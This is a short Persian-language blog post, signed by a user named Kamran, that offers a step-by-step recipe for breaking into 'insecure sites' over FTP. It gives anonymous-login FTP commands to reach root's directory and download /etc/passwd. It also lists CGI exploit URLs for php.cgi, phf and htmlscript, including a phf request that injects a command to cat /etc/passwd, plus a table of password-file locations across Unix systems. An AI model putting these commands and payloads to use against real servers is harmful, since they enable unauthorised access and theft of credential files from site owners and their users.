سلام دوستان عزیز.

هک کردن سایت های نا امن با FTP که به وسیله ی تیم Grand Lord  کشف شده است.

شروع کار --

بریت Start \ Run  و بنویسید CMD  .

صفحه DOS باز می شه .

و دستورات زیر را وارد کنید .

cd\

cls

FTP Victim.com

Victim   همان سایت مورد نظر میباشد

بعد سایت از شما یوزر می خواد هیچی ننویسید اینتر را بزنید

بعد سایت از شما پسورد می خواد هیچی ننویسید اینتر را بزنید

و بعد دستورات زیر را بنویسید

quote user ftp

quote cwd ~root

quote pass ftp

توجه داشنه باشید که محل نگه داری پسوردها به صورت زیر می باشد

PHP Bug:
http://VICTIMS-DOMAIN/cgi-bin/php.cgi?/etc/passwd

PHF Bug:
http://VICTIMS-DOMAIN/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

HTML-SCRIPT Bug:
http://VICTIMS-DOMAIN/cgi-bin/htmlscript?/etc/passwd

SunOS 5.0 /etc/shadow
EP/IX /etc/shadow x
System Rel. 4.0 /etc/shadow x
IRIX 5 /etc/shadow x
HP UX /.secure/etc/passwd *
BSD4.3 Reno /etc/master.passwd *
Linux1.1 /etc/shadow *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
AIX 3 /etc/security/passwd

اگر سایت ناامن باشد به شما رموت میده و شما میتوانید پسورد را در بیارید و برای داونلود کردن پسورد دستورات زیر را اجرا کنید

cd etc

get passwd

نوشته شده توسط كامران ساعت: 15:41